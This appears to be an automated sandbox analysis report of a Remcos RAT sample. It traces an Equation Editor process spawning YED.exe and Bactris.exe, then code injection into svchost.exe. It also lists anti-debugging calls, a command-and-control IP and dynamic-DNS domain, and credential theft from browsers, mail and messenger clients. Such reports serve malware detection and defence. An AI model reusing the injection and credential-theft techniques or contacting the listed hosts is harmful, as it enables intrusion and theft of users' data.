Code function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

17_2_00407C97

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_002142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_002142DE

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_2-5273
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_2-4996

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0028EAA2 BlockInput,

3_2_0028EAA2

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_00242622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00242622

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_002142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_002142DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035006C3 mov edx, dword ptr fs:[00000030h]	2_2_035006C3
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029F40E8 mov eax, dword ptr fs:[00000030h]	3_3_029F40E8
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00234CE8 mov eax, dword ptr fs:[00000030h]	3_2_00234CE8
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A4CE8 mov eax, dword ptr fs:[00000030h]	16_2_010A4CE8
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_00113530 mov eax, dword ptr fs:[00000030h]	16_2_00113530
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_00113590 mov eax, dword ptr fs:[00000030h]	16_2_00113590
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_00111EF0 mov eax, dword ptr fs:[00000030h]	16_2_00111EF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004432B5 mov eax, dword ptr fs:[00000030h]	17_2_004432B5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_10004AB4 mov eax, dword ptr fs:[00000030h]	17_2_10004AB4

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_00270B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

3_2_00270B62

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_002309D5 SetUnhandledExceptionFilter,	3_2_002309D5
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00242622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00242622
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0023083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0023083F
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00230C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00230C21
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A09D5 SetUnhandledExceptionFilter,	16_2_010A09D5
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_010B2622
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_010A083F
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_010A0C21
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00434B47 SetUnhandledExceptionFilter,	17_2_00434B47
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_004349F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_0043BB22
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00434FDC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_100060E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_10002639
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.94.53.100 2766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yuahdgbceja.sytes.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

17_2_004180EF

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

17_2_004120F7

Source: C:\Users\user\AppData\Roaming\YED.exe

3_2_00271201

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_00252BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

3_2_00252BA5

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0027B226 SendInput,keybd_event,

3_2_0027B226

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_002922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

3_2_002922DA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\YED.exe C:\Users\user\AppData\Roaming\YED.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Process created: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe C:\Users\user\AppData\Roaming\YED.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\YED.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\YED.exe

3_2_00270B62

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_00271663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

3_2_00271663

Source: YED.exe, 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmp, YED.exe, 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmp, Bactris.exe, 00000010.00000000.760231345.0000000001142000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: YED.exe, Bactris.exe	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000011.00000002.783667001.0000000000914000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: svchost.exe, 00000011.00000002.783667001.0000000000914000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_3_029EFA98 cpuid

3_3_029EFA98

Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	17_2_00452036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	17_2_004520C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	17_2_00452313
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	17_2_00448404
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_0045243C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	17_2_00452543
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_00452610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,	17_2_0040F8D1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	17_2_004488ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: IsValidCodePage,GetLocaleInfoW,	17_2_00451CD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	17_2_00451F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	17_2_00451F9B

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0024333F GetSystemTimeAsFileTime,

3_2_0024333F

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0026D27A GetUserNameW,

3_2_0026D27A

Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe

Code function: 16_2_010BB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

16_2_010BB952

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_002142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_002142DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\svchost.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

17_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\svchost.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		17_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: \key3.db		17_2_0040BB30

Searches for Windows Mail specific files

Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3752, type: MEMORYSTR

Source: Bactris.exe	Binary or memory string: WIN_81
Source: Bactris.exe	Binary or memory string: WIN_XP
Source: Bactris.exe.3.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Bactris.exe	Binary or memory string: WIN_XPe
Source: Bactris.exe	Binary or memory string: WIN_VISTA
Source: Bactris.exe	Binary or memory string: WIN_7
Source: Bactris.exe	Binary or memory string: WIN_8

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\svchost.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR

Source: C:\Windows\SysWOW64\svchost.exe

Code function: cmd.exe

17_2_0040569A

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00291204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	3_2_00291204
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00291806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	3_2_00291806
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_01101204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	16_2_01101204
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_01101806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	16_2_01101806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	2 Valid Accounts	1 Native API	2 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	25 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
